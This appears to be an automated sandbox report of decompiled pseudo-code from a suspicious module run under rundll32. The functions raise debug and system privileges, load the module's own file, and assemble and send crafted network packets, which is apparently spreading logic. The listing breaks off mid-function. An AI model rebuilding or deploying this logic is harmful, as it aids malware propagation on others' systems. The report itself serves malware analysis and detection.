                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t63 = HeapAlloc(GetProcessHeap(), 8, 0x27);
                                                                                                                                                  				if(_t63 != 0) {
                                                                                                                                                  					 *_t63 = 0x12;
                                                                                                                                                  					 *((intOrPtr*)(_t63 + 0x1c)) = 0x48;
                                                                                                                                                  					if(1 !=  *__ebx) {
                                                                                                                                                  						 *(_t63 + 8) = 8;
                                                                                                                                                  					} else {
                                                                                                                                                  						 *(_t63 + 8) = 4;
                                                                                                                                                  					}
                                                                                                                                                  					 *(_t63 + 0x18) =  *(_t63 + 8);
                                                                                                                                                  					 *(_t63 + 0x20) =  *(_t54 + 0x54) & 0x000000ff;
                                                                                                                                                  					 *(_t63 + 0x25) =  *(_t63 + 0x18) + 1;
                                                                                                                                                  					_t43 = HeapAlloc(GetProcessHeap(), 8, 9);
                                                                                                                                                  					_v12 = _t43;
                                                                                                                                                  					if(_t43 != 0) {
                                                                                                                                                  						 *((intOrPtr*)(_t43 + 1)) = _a12;
                                                                                                                                                  						 *((intOrPtr*)(_t43 + 5)) = _a16;
                                                                                                                                                  						_t58 =  *(_t63 + 0x25) & 0x0000ffff;
                                                                                                                                                  						if(E04773209( *(_t63 + 0x25) & 0x0000ffff, _a4, _a8,  *(_t54 + 0x30) & 0x0000ffff, _t63, _t43,  *(_t63 + 0x25) & 0x0000ffff) != 0) {
                                                                                                                                                  							Sleep(0x7d0);
                                                                                                                                                  							_t50 = _a24 & 0x0000ffff;
                                                                                                                                                  							 *(_t63 + 0x20) =  *(_t63 + 0x20) & 0x00000000;
                                                                                                                                                  							 *(_t63 + 8) = _t50;
                                                                                                                                                  							 *(_t63 + 0x18) = _t50;
                                                                                                                                                  							_t51 = _t50 + 1;
                                                                                                                                                  							 *(_t63 + 0x25) = _t50 + 1;
                                                                                                                                                  							if(E04773209(_t58, _a4, _a8,  *(_t54 + 0x32) & 0x0000ffff, _t63, _a20, _t51) != 0) {
                                                                                                                                                  								Sleep(0x7d0);
                                                                                                                                                  								_v5 = 1;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                  					}
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _t63);
                                                                                                                                                  				}
                                                                                                                                                  				return _v5;
                                                                                                                                                  			}









                                                                                                                                                  0x047740e3
                                                                                                                                                  0x047740e6
                                                                                                                                                  0x047740e7
                                                                                                                                                  0x047740f4
                                                                                                                                                  0x04774101
                                                                                                                                                  0x04774105
                                                                                                                                                  0x0477410e
                                                                                                                                                  0x04774111
                                                                                                                                                  0x0477411b
                                                                                                                                                  0x04774126
                                                                                                                                                  0x0477411d
                                                                                                                                                  0x0477411d
                                                                                                                                                  0x0477411d
                                                                                                                                                  0x04774130
                                                                                                                                                  0x04774137
                                                                                                                                                  0x04774144
                                                                                                                                                  0x0477414b
                                                                                                                                                  0x04774151
                                                                                                                                                  0x04774156
                                                                                                                                                  0x0477415b
                                                                                                                                                  0x04774161
                                                                                                                                                  0x04774164
                                                                                                                                                  0x0477417d
                                                                                                                                                  0x04774184
                                                                                                                                                  0x0477418a
                                                                                                                                                  0x0477418e
                                                                                                                                                  0x04774192
                                                                                                                                                  0x04774195
                                                                                                                                                  0x04774198
                                                                                                                                                  0x0477419a
                                                                                                                                                  0x047741b5
                                                                                                                                                  0x047741bc
                                                                                                                                                  0x047741c2
                                                                                                                                                  0x047741c2
                                                                                                                                                  0x047741b5
                                                                                                                                                  0x047741ce
                                                                                                                                                  0x047741ce
                                                                                                                                                  0x047741da
                                                                                                                                                  0x047741da
                                                                                                                                                  0x047741e6

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,0477423D,?,?,?,?,00000000,00000002), ref: 047740F8
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,0477423D,?,?,?,?,00000000,00000002), ref: 047740FB
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,0477423D,?,?,?,?,00000000,00000002), ref: 04774148
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,0477423D,?,?,?,?,00000000,00000002), ref: 0477414B
                                                                                                                                                  • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,0477423D,?,?,?,?,00000000), ref: 04774184
                                                                                                                                                  • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,0477423E,?,?,?,0477423D,?,?,?,?,00000000), ref: 047741BC
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,0477423D,?,?,?,?), ref: 047741CB
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,0477423D,?,?,?,?,00000000,00000002), ref: 047741CE
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,0477423D,?,?,?,?,00000000,00000002), ref: 047741D7
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,0477423D,?,?,?,?,00000000,00000002), ref: 047741DA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFreeSleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1437939644-0
                                                                                                                                                  • Opcode ID: cfe5cc6fbf849d2005e382376fc1936d003b4e78e0e8222c7a7c81cbda7ea89c
                                                                                                                                                  • Instruction ID: 7d46444db5c93d0b50fa182f0f7c087d01fc9aa152b5b775f17a398a1be428a5
                                                                                                                                                  • Opcode Fuzzy Hash: cfe5cc6fbf849d2005e382376fc1936d003b4e78e0e8222c7a7c81cbda7ea89c
                                                                                                                                                  • Instruction Fuzzy Hash: 44318F74500315AADF30AF65C908BAB7FF8EF49341F408549FE8A9A290D778E845DB60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                  			E04777897(void* __ecx, void* __esi) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				long _t3;
                                                                                                                                                  				void* _t15;
                                                                                                                                                  				signed int _t18;
                                                                                                                                                  
                                                                                                                                                  				if( *0x4787b8c == 0) {
                                                                                                                                                  					srand(GetTickCount());
                                                                                                                                                  					_pop(_t15);
                                                                                                                                                  					 *0x4787b90 = GetTickCount();
                                                                                                                                                  					_t18 = 0;
                                                                                                                                                  					if(E04777CC5(L"SeShutdownPrivilege") != 0) {
                                                                                                                                                  						_t18 = 1;
                                                                                                                                                  					}
                                                                                                                                                  					if(E04777CC5(L"SeDebugPrivilege") != 0) {
                                                                                                                                                  						_t18 = _t18 | 0x00000002;
                                                                                                                                                  					}
                                                                                                                                                  					if(E04777CC5(L"SeTcbPrivilege") != 0) {
                                                                                                                                                  						_t18 = _t18 | 0x00000004;
                                                                                                                                                  					}
                                                                                                                                                  					 *0x4787bc0 = _t18;
                                                                                                                                                  					 *0x4787b7c = E0477855F();
                                                                                                                                                  					E0477554A(_t15,  &_v8, 4);
                                                                                                                                                  					 *0x4787bbc = _v8;
                                                                                                                                                  					_t3 = GetModuleFileNameW( *0x4787b98, 0x4787bc8, 0x30c);
                                                                                                                                                  					if(_t3 != 0) {
                                                                                                                                                  						return E04778832();
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t3;
                                                                                                                                                  			}







                                                                                                                                                  0x047778a2
                                                                                                                                                  0x047778b2
                                                                                                                                                  0x047778b8
                                                                                                                                                  0x047778c0
                                                                                                                                                  0x047778c5
                                                                                                                                                  0x047778ce
                                                                                                                                                  0x047778d0
                                                                                                                                                  0x047778d0
                                                                                                                                                  0x047778dd
                                                                                                                                                  0x047778df
                                                                                                                                                  0x047778df
                                                                                                                                                  0x047778ee
                                                                                                                                                  0x047778f0
                                                                                                                                                  0x047778f0
                                                                                                                                                  0x047778f3
                                                                                                                                                  0x047778fe
                                                                                                                                                  0x04777909
                                                                                                                                                  0x04777921
                                                                                                                                                  0x04777926
                                                                                                                                                  0x0477792f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04777931
                                                                                                                                                  0x0477792f
                                                                                                                                                  0x04777937

                                                                                                                                                  APIs
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 047778AF
                                                                                                                                                  • srand.MSVCRT ref: 047778B2
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 047778B9
                                                                                                                                                    • Part of subcall function 04777CC5: GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,047779E8), ref: 04777CE9
                                                                                                                                                    • Part of subcall function 04777CC5: OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,047779E8), ref: 04777CF0
                                                                                                                                                    • Part of subcall function 04777CC5: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 04777D02
                                                                                                                                                    • Part of subcall function 04777CC5: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04777D25
                                                                                                                                                    • Part of subcall function 04777CC5: GetLastError.KERNEL32(?,00000000), ref: 04777D2D
                                                                                                                                                    • Part of subcall function 04777CC5: SetLastError.KERNEL32(?,?,00000000,?,?,?,047779E8), ref: 04777D3F
                                                                                                                                                  • GetModuleFileNameW.KERNEL32(04787BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,047779E8), ref: 04777926
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountErrorLastProcessTickToken$AdjustCurrentFileLookupModuleNameOpenPrivilegePrivilegesValuesrand
                                                                                                                                                  • String ID: SeDebugPrivilege$SeShutdownPrivilege$SeTcbPrivilege
                                                                                                                                                  • API String ID: 1536163209-50072501
                                                                                                                                                  • Opcode ID: 1034519ef4ebe26102fadbb477e1c06ccad1bf107313ea084026d41c4222558c
                                                                                                                                                  • Instruction ID: 009673abe993c8a98abf6a749f4b3c0170eafab9a8795a48f3df880af1c887e0
                                                                                                                                                  • Opcode Fuzzy Hash: 1034519ef4ebe26102fadbb477e1c06ccad1bf107313ea084026d41c4222558c
                                                                                                                                                  • Instruction Fuzzy Hash: D7012571E8131097EF28BB75DC09A9A3F5EEB44694BE58059E912A2340DB7CFC01CF91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04774F43(short __eax, intOrPtr _a4, void* _a8, void** _a12) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				signed int _t27;
                                                                                                                                                  				int _t28;
                                                                                                                                                  				void* _t36;
                                                                                                                                                  				void* _t39;
                                                                                                                                                  				signed char _t40;
                                                                                                                                                  				signed int _t41;
                                                                                                                                                  				short _t50;
                                                                                                                                                  
                                                                                                                                                  				_t50 = __eax;
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t39 = HeapAlloc(GetProcessHeap(), 8, 0x68);
                                                                                                                                                  				if(_t39 == 0) {
                                                                                                                                                  					L11:
                                                                                                                                                  					return _v5;
                                                                                                                                                  				}
                                                                                                                                                  				_t40 = 0;
                                                                                                                                                  				do {
                                                                                                                                                  					_t27 = _t40 & 0x000000ff;
                                                                                                                                                  					_t2 = _t27 + 0x4783730; // 0xfcfffffa
                                                                                                                                                  					_t40 = _t40 + 1;
                                                                                                                                                  					 *(_t39 + _t27) =  !( *_t2);
                                                                                                                                                  				} while (_t40 < 0x68);
                                                                                                                                                  				_t28 = rand();
                                                                                                                                                  				 *(_t39 + 0x18) = _t28;
                                                                                                                                                  				 *((short*)(_t39 + 0x34)) = _t28 + _t50;
                                                                                                                                                  				if(E04772F5A(_a4, _a8, _t50, 0, 0xff, 8, _t39, 0x68) != 0) {
                                                                                                                                                  					_v12 = 0;
                                                                                                                                                  					_v16 = 0;
                                                                                                                                                  					if(E04773071(_t40, _a4, _a8, _t50,  &_v16,  &_v12) != 0) {
                                                                                                                                                  						_t36 = _v16;
                                                                                                                                                  						if(_v12 == 0x70 &&  *((intOrPtr*)(_t36 + 0x50)) == 0x18 &&  *((intOrPtr*)(_t36 + 0x6c)) == 0) {
                                                                                                                                                  							_t41 = 5;
                                                                                                                                                  							_t36 = memcpy( *_a12, _t36 + 0x58, _t41 << 2);
                                                                                                                                                  							_v5 = 1;
                                                                                                                                                  						}
                                                                                                                                                  						HeapFree(GetProcessHeap(), 8, _t36);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				HeapFree(GetProcessHeap(), 8, _t39);
                                                                                                                                                  				goto L11;
                                                                                                                                                  			}













                                                                                                                                                  0x04774f50
                                                                                                                                                  0x04774f52
                                                                                                                                                  0x04774f63
                                                                                                                                                  0x04774f69
                                                                                                                                                  0x04775014
                                                                                                                                                  0x0477501b
                                                                                                                                                  0x0477501b
                                                                                                                                                  0x04774f6f
                                                                                                                                                  0x04774f71
                                                                                                                                                  0x04774f71
                                                                                                                                                  0x04774f74
                                                                                                                                                  0x04774f7a
                                                                                                                                                  0x04774f7e
                                                                                                                                                  0x04774f81
                                                                                                                                                  0x04774f86
                                                                                                                                                  0x04774f9b
                                                                                                                                                  0x04774fa4
                                                                                                                                                  0x04774faf
                                                                                                                                                  0x04774fbd
                                                                                                                                                  0x04774fc3
                                                                                                                                                  0x04774fcd
                                                                                                                                                  0x04774fd3
                                                                                                                                                  0x04774fd6
                                                                                                                                                  0x04774fed
                                                                                                                                                  0x04774fee
                                                                                                                                                  0x04774ff0
                                                                                                                                                  0x04774ff0
                                                                                                                                                  0x04774ffe
                                                                                                                                                  0x04774ffe
                                                                                                                                                  0x04774fcd
                                                                                                                                                  0x0477500e
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000068,74CB4F20,?,778C4620,?,047751F9,?,?,?), ref: 04774F56
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,047751F9,?,?,?), ref: 04774F5D
                                                                                                                                                  • rand.MSVCRT ref: 04774F86
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,047751F9,?,00000000,?,047751F9,047751F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 04774FF7
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04774FFE
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,047751F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,047751F9,?,?,?), ref: 04775007
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,047751F9,?,?,?), ref: 0477500E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$Free$Allocrand
                                                                                                                                                  • String ID: p
                                                                                                                                                  • API String ID: 2875874559-2181537457
                                                                                                                                                  • Opcode ID: 78f061765ed61e70159e8d2123741a06ee0a565a8a67fee75342d822cc154332
                                                                                                                                                  • Instruction ID: fc070901420c12c6fadd16d2a2d2b9dbf2b7d2282a4d9151694b1997a1b9529c
                                                                                                                                                  • Opcode Fuzzy Hash: 78f061765ed61e70159e8d2123741a06ee0a565a8a67fee75342d822cc154332
                                                                                                                                                  • Instruction Fuzzy Hash: D421E235940244BBEF219FA48C88FEE7F79EF45301F448085FA019B281C6759849CBA1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04778832() {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				long _v16;
                                                                                                                                                  				void* _t10;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				long _t25;
                                                                                                                                                  
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				_t10 = CreateFileW(0x4787bc8, 0x80000000, 1, 0, 3, 0, 0);
                                                                                                                                                  				_v12 = _t10;
                                                                                                                                                  				if(_t10 != 0xffffffff) {
                                                                                                                                                  					_t25 = GetFileSize(_t10, 0);
                                                                                                                                                  					if(_t25 != 0) {
                                                                                                                                                  						_t21 = HeapAlloc(GetProcessHeap(), 0, _t25);
                                                                                                                                                  						if(_t21 != 0) {
                                                                                                                                                  							_v8 = 0;
                                                                                                                                                  							if(ReadFile(_v12, _t21, _t25,  &_v8, 0) != 0 || _v8 != _t25) {
                                                                                                                                                  								 *0x4783984 = _t21;
                                                                                                                                                  								 *0x4787b94 = _t25;
                                                                                                                                                  								_v16 = 1;
                                                                                                                                                  							} else {
                                                                                                                                                  								HeapFree(GetProcessHeap(), 0, _t21);
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					CloseHandle(_v12);
                                                                                                                                                  				}
                                                                                                                                                  				return _v16;
                                                                                                                                                  			}









                                                                                                                                                  0x0477884c
                                                                                                                                                  0x0477884f
                                                                                                                                                  0x04778855
                                                                                                                                                  0x0477885b
                                                                                                                                                  0x04778866
                                                                                                                                                  0x0477886a
                                                                                                                                                  0x0477887c
                                                                                                                                                  0x04778880
                                                                                                                                                  0x0477888c
                                                                                                                                                  0x04778897
                                                                                                                                                  0x047788af
                                                                                                                                                  0x047788b5
                                                                                                                                                  0x047788bb
                                                                                                                                                  0x0477889e
                                                                                                                                                  0x047788a7
                                                                                                                                                  0x047788a7
                                                                                                                                                  0x04778897
                                                                                                                                                  0x047788c2
                                                                                                                                                  0x047788c6
                                                                                                                                                  0x047788cc
                                                                                                                                                  0x047788d2

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNEL32(04787BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0477884F
                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 04778860
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0477886F
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04778876
                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0477888F
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 047788A0
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 047788A7
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 047788C6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3250796435-0
                                                                                                                                                  • Opcode ID: 0f9c57a5f57c4ef162fe4a21421b86d32756713d7caa5edccb30137b18999529
                                                                                                                                                  • Instruction ID: 83d5bf6acd4fbfceb13d489e22b76a4ed959b7406f3a028f0d0ad100cb69deae
                                                                                                                                                  • Opcode Fuzzy Hash: 0f9c57a5f57c4ef162fe4a21421b86d32756713d7caa5edccb30137b18999529
                                                                                                                                                  • Instruction Fuzzy Hash: 97114F70910204BBDB306BA5ED8CDEFBFBCEF85750F518159F512A2240D7789D42DA21
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                  			E047733A4(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void* _a16, void* _a20, signed int _a24) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				long _v12;
                                                                                                                                                  				long _t21;
                                                                                                                                                  				void* _t27;
                                                                                                                                                  				void* _t31;
                                                                                                                                                  				void* _t35;
                                                                                                                                                  				signed int _t38;
                                                                                                                                                  				void* _t40;
                                                                                                                                                  				void* _t46;
                                                                                                                                                  
                                                                                                                                                  				_t21 = (_a24 & 0x0000ffff) + 0x37;
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_v12 = _t21;
                                                                                                                                                  				_t35 = HeapAlloc(GetProcessHeap(), 8, _t21);
                                                                                                                                                  				if(_t35 != 0) {
                                                                                                                                                  					_t38 = 9;
                                                                                                                                                  					_t27 = memcpy(_t35, _a8, _t38 << 2);
                                                                                                                                                  					__imp__#9(_v12 + 0xfffffffc, _t40, _t46);
                                                                                                                                                  					 *(_t35 + 2) = _t27;
                                                                                                                                                  					 *((short*)(_t35 + 0x22)) = _a12;
                                                                                                                                                  					 *((char*)(_t35 + 8)) = 0x26;
                                                                                                                                                  					asm("movsd");
                                                                                                                                                  					asm("movsd");
                                                                                                                                                  					asm("movsd");
                                                                                                                                                  					asm("movsd");
                                                                                                                                                  					asm("movsw");
                                                                                                                                                  					_t15 = _t35 + 0x37; // 0x37
                                                                                                                                                  					asm("movsb");
                                                                                                                                                  					_t31 = memcpy(_t15, _a20, _a24 & 0x0000ffff);
                                                                                                                                                  					__imp__#19(_a4, _t35, _v12, 0);
                                                                                                                                                  					if(_t31 > 0) {
                                                                                                                                                  						_v5 = 1;
                                                                                                                                                  					}
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _t35);
                                                                                                                                                  				}
                                                                                                                                                  				return _v5;
                                                                                                                                                  			}












                                                                                                                                                  0x047733ae
                                                                                                                                                  0x047733b4
                                                                                                                                                  0x047733b8
                                                                                                                                                  0x047733c8
                                                                                                                                                  0x047733cc
                                                                                                                                                  0x047733d8
                                                                                                                                                  0x047733df
                                                                                                                                                  0x047733e1
                                                                                                                                                  0x047733ea
                                                                                                                                                  0x047733f2
                                                                                                                                                  0x047733fa
                                                                                                                                                  0x04773401
                                                                                                                                                  0x04773402
                                                                                                                                                  0x04773403
                                                                                                                                                  0x04773404
                                                                                                                                                  0x04773409
                                                                                                                                                  0x0477340b
                                                                                                                                                  0x0477340f
                                                                                                                                                  0x04773410
                                                                                                                                                  0x04773421
                                                                                                                                                  0x0477342b
                                                                                                                                                  0x0477342d
                                                                                                                                                  0x0477342d
                                                                                                                                                  0x0477343b
                                                                                                                                                  0x0477343b
                                                                                                                                                  0x04773446

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04773745,?,?,?,00000000,00000000,?,?,?,04774A6E), ref: 047733BB
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,04773745,?,?,?,00000000,00000000,?,?,?,04774A6E,?,?,?,?), ref: 047733C2
                                                                                                                                                  • htons.WS2_32(?), ref: 047733E1
                                                                                                                                                  • memcpy.MSVCRT ref: 04773410
                                                                                                                                                  • send.WS2_32(?,00000000,?,00000000), ref: 04773421
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04773434
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0477343B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFreehtonsmemcpysend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4260819906-0
                                                                                                                                                  • Opcode ID: 72c04837cda38a7669d58ab53c57a3e530859ed76b94ebe389081775f7288ff0
                                                                                                                                                  • Instruction ID: 77c2b466adcebbfe641909ff316c4ebcdd514fc35567975a02e18bd3c7b5770a
                                                                                                                                                  • Opcode Fuzzy Hash: 72c04837cda38a7669d58ab53c57a3e530859ed76b94ebe389081775f7288ff0
                                                                                                                                                  • Instruction Fuzzy Hash: D9118BB6500249ABEF119FA4D889BEB3BB9EF09310F448085FE00AA241D7B9D906C770
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                  			E04773209(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void* _a16, void* _a20, signed short _a24) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				long _v12;
                                                                                                                                                  				long _t22;
                                                                                                                                                  				void* _t28;
                                                                                                                                                  				int _t31;
                                                                                                                                                  				void* _t33;
                                                                                                                                                  				void* _t37;
                                                                                                                                                  				signed int _t40;
                                                                                                                                                  				void* _t44;
                                                                                                                                                  				void* _t52;
                                                                                                                                                  
                                                                                                                                                  				_t22 = (_a24 & 0x0000ffff) + 0x4b;
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_v12 = _t22;
                                                                                                                                                  				_t37 = HeapAlloc(GetProcessHeap(), 8, _t22);
                                                                                                                                                  				if(_t37 != 0) {
                                                                                                                                                  					_t40 = 9;
                                                                                                                                                  					_t28 = memcpy(_t37, _a8, _t40 << 2);
                                                                                                                                                  					__imp__#9(_v12 + 0xfffffffc, _t44, _t52);
                                                                                                                                                  					 *(_t37 + 2) = _t28;
                                                                                                                                                  					 *((short*)(_t37 + 0x22)) = _a12;
                                                                                                                                                  					 *((char*)(_t37 + 8)) = 0xa1;
                                                                                                                                                  					_t13 = _t37 + 0x24; // 0x24
                                                                                                                                                  					_t31 = memcpy(_t13, _a16, 0 << 2);
                                                                                                                                                  					asm("movsw");
                                                                                                                                                  					_t16 = _t37 + 0x4b; // 0x4b
                                                                                                                                                  					asm("movsb");
                                                                                                                                                  					_t33 = memcpy(_t16, _a20, _t31);
                                                                                                                                                  					__imp__#19(_a4, _t37, _v12, 0, 9);
                                                                                                                                                  					if(_t33 > 0) {
                                                                                                                                                  						_v5 = 1;
                                                                                                                                                  					}
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _t37);
                                                                                                                                                  				}
                                                                                                                                                  				return _v5;
                                                                                                                                                  			}













                                                                                                                                                  0x04773213
                                                                                                                                                  0x04773219
                                                                                                                                                  0x0477321d
                                                                                                                                                  0x0477322d
                                                                                                                                                  0x04773231
                                                                                                                                                  0x0477323d
                                                                                                                                                  0x04773244
                                                                                                                                                  0x04773246
                                                                                                                                                  0x0477324f
                                                                                                                                                  0x04773259
                                                                                                                                                  0x04773262
                                                                                                                                                  0x04773266
                                                                                                                                                  0x04773269
                                                                                                                                                  0x0477326f
                                                                                                                                                  0x04773271
